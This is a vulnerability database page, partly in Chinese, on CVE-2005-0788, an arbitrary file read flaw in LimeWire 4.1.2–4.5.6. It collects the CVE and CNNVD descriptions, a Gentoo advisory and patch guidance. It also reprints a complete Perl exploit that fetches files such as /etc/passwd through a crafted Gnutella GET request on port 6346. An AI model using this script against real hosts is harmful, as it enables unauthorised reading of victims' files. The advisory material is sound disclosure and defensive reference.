CVE-2005-0788
CVSS5.0
发布时间 :2005-03-14 00:00:00
修订时间 :2016-10-17 23:14:33
NMCOEP    

[原文]LimeWire 4.1.2 through 4.5.6 allows remote attackers to read arbitrary files by specifying the full pathname in a Gnutella GET request.


[CNNVD]LimeWire 远程任意文件访问漏洞(CNNVD-200503-107)

        LimeWire是一种兼容Gnutella协议的文件交换工具。
        LimeWire在处理用户HTTP请求时存在漏洞,远程攻击者可能利用此漏洞访问系统上的任意文件。
        LimeWire处理畸形的文件上传下载请求时没能正确处理,攻击者可以在请求中通过插入多个"/"字符直接访问到系统文件。
        <**>
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:limewire:limewire:4.1.2
cpe:/a:limewire:limewire:4.5.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0788
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0788
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-107
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111082448213238&w=2
(UNKNOWN)  BUGTRAQ  20050314 LimeWire Gnutella client two vulnerabilities
http://www.gentoo.org/security/en/glsa/glsa-200503-37.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200503-37
http://xforce.iss.net/xforce/xfdb/19693
(VENDOR_ADVISORY)  XF  limewire-client-information-disclosure(19693)

- 漏洞信息

LimeWire 远程任意文件访问漏洞
中危 访问验证错误
2005-03-14 00:00:00 2005-10-20 00:00:00
远程  
        LimeWire是一种兼容Gnutella协议的文件交换工具。
        LimeWire在处理用户HTTP请求时存在漏洞,远程攻击者可能利用此漏洞访问系统上的任意文件。
        LimeWire处理畸形的文件上传下载请求时没能正确处理,攻击者可以在请求中通过插入多个"/"字符直接访问到系统文件。
        <**>
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.limewire.com/

- 漏洞信息 (879)

LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit (EDBID:879)
multiple remote
2005-03-14 Verified
0 lammat
N/A [点击下载]
#!/usr/bin/perl
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit	    *	
#                written by lammat 			   *
#              http://grpower.ath.cx		          *
#		lammat@iname.com			 *						
#	      Discovered by Kevin Walsh                 *	

use IO::Socket;

$host = @ARGV[0];
$file = @ARGV[1];

unless (@ARGV == 2) {
print "usage: $0 host file\n";
print "E.g: $0 10.0.0.2 /etc/passwd\n";
exit
}

@req = "GET /gnutella/res//$file HTTP/1.1\n
User-Agent: I-AM-AN-ATTACKER/1.0\n
Host: 0.0.0.0:0\n
Accept: */*\n
Connection: Keep-Alive";

print "[+] checking if host exists...\n";
$string = inet_aton($host) || die "[-] Host does not exist...\n";

print "[+] $host exists...connecting...\n";
$web = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "6346",
)
or die "cannot connect to the $host";
if ($web)
{
print "[+] Connected...sending the request...\n";

print $web "@req";


while ( <$web> )
{ print }
close $web;
}

# milw0rm.com [2005-03-14]
		

- 漏洞信息 (F36915)

Gentoo Linux Security Advisory 200503-37 (PacketStormID:F36915)
2005-04-14 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-0788,CVE-2005-0789
[点击下载]

Gentoo Linux Security Advisory GLSA 200503-37 - Two input validation errors were found in the handling of Gnutella GET requests (CVE-2005-0788) and magnet requests (CVE-2005-0789). Versions less than 4.8.1 are affected.

This is a multi-part message in MIME format.

--------------enig484C1F128A826C3FB6A231B8
Content-Type: text/plain;
	charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200503-37
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: LimeWire: Disclosure of sensitive information
      Date: March 31, 2005
      Bugs: #85380
        ID: 200503-37

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two vulnerabilities in LimeWire can be exploited to disclose sensitive
information.

Background
==========

LimeWire is a Java peer-to-peer client compatible with the Gnutella
file-sharing protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  net-p2p/limewire       < 4.8.1                           >= 4.8.1

Description
===========

Two input validation errors were found in the handling of Gnutella GET
requests (CAN-2005-0788) and magnet requests (CAN-2005-0789).

Impact
======

A remote attacker can craft a specific Gnutella GET request or use
directory traversal on magnet requests to read arbitrary files on the
system with the rights of the user running LimeWire.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All LimeWire users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-p2p/limewire-4.8.1"

References
==========

  [ 1 ] CAN-2005-0788
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0788
  [ 2 ] CAN-2005-0789
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0789
  [ 3 ] Secunia Advisory SA14555
        http://secunia.com/advisories/14555/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200503-37.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


--------------enig484C1F128A826C3FB6A231B8
Content-Type: application/pgp-signature;
	name="signature.asc"
Content-Transfer-Encoding: 7bit
Content-Description: OpenPGP digital signature
Content-Disposition: attachment;
	filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCS+DxvcL1obalX08RArZYAJ9xQuG+MjYnazJli/8hsYmTVuWyAQCglR4H
H0FPhe75yIDLEN45ctI8hO0=
=svQx
-----END PGP SIGNATURE-----

--------------enig484C1F128A826C3FB6A231B8--
    

- 漏洞信息

14671
LimeWire HTTP Request Handling Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

LimeWire contains a flaw that may allow a remote attacker to access arbitrary files. The issue is triggered due to improper handling of HTTP requests. By issuing a specially crafted HTTP GET request a remote attacker could access arbitrary files resulting in a loss of confidentiality.

- 时间线

2005-03-11 2001-01-01
2005-03-14 Unknow

- 解决方案

Upgrade to version 4.6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站